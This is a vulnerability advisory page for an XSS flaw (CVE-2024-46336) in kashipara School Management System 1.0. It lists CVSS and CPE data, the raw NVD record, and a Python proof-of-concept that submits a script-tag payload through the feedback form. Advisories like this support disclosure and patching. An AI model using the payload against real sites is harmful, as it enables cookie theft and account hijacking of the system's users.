Security Vulnerability Report
中文
CVE-2024-46336 CVSS 6.1 MEDIUM

CVE-2024-46336

Published: 2025-11-17 17:15:47
Last Modified: 2025-11-19 13:10:10

Description

kashipara School Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via /client_user/feedback.php.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:kashipara:school_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
kashipara School Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2024-46336 PoC - XSS in kashipara School Management System 1.0 # Target: /client_user/feedback.php target_url = "http://target-site.com/client_user/feedback.php" # XSS payload to steal cookies xss_payload = "<script>alert(document.cookie)</script>" # Data for feedback submission data = { "name": "Test User", "email": "[email protected]", "subject": "Feedback", "message": xss_payload, "submit": "Submit" } try: response = requests.post(target_url, data=data, timeout=10) print(f"Payload sent: {xss_payload}") print(f"Response status: {response.status_code}") # Verify XSS payload is reflected if xss_payload in response.text: print("Vulnerability confirmed: XSS payload reflected without sanitization") else: print("Payload may have been filtered or encoded") except requests.exceptions.RequestException as e: print(f"Request failed: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-46336", "sourceIdentifier": "[email protected]", "published": "2025-11-17T17:15:46.720", "lastModified": "2025-11-19T13:10:09.857", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "kashipara School Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via /client_user/feedback.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kashipara:school_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "64D1D420-4CF4-4575-A046-E984DABD651A"}]}]}], "references": [{"url": "https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-46336.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.kashipara.com/project/php/73/school-management-system-download-project-source-code-in-php", "source": "[email protected]", "tags": ["Product"]}]}}